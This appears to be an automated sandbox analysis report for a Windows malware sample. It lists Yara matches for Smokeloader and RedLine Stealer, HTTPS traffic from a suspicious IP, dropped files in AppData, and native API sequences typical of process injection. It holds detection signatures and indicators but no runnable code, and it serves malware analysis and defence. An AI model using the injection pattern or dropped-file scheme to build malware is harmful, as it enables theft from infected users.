                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50024 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50026 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50027 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50029 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50030 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara match | File source: 9.2.jtihrdr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.3.jtihrdr.530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.B9A0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.3.B9A0.exe.20c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.B9A0.exe.1fa0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.jtihrdr.520e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtEnumerateKey,0_2_00403277
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,4_2_00403277
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Code function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401514
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00402F97 RtlCreateUserThread,NtTerminateProcess,8_2_00402F97
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401542
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00403247 NtTerminateProcess,GetModuleHandleA,8_2_00403247
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401549
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_0040324F NtTerminateProcess,GetModuleHandleA,8_2_0040324F
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00403256 NtTerminateProcess,GetModuleHandleA,8_2_00403256
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401557
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_0040326C NtTerminateProcess,GetModuleHandleA,8_2_0040326C
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,8_2_00403277
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014FE
                Source: C:\Users\user\AppData\Roaming\teihrdr | Code function: 8_2_00403290 NtTerminateProcess,GetModuleHandleA,8_2_00403290
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_00403043 RtlCreateUserThread,NtTerminateProcess,9_2_00403043
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014C4
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_00401508 NtAllocateVirtualMemory,9_2_00401508
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004014CF NtAllocateVirtualMemory,9_2_004014CF
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015D5
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004014DE NtAllocateVirtualMemory,9_2_004014DE
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015DF
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015E6
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015F2
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004014F5 NtAllocateVirtualMemory,9_2_004014F5
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004014F8 NtAllocateVirtualMemory,9_2_004014F8
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Code function: 9_2_004014FB NtAllocateVirtualMemory,9_2_004014FB
                Source: BzLGqYKy7o.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/4@7/4
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_005B01D0 CreateToolhelp32Snapshot,Module32First,0_2_005B01D0
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\teihrdrJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B9A0.tmpJump to behavior
                Source: BzLGqYKy7o.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
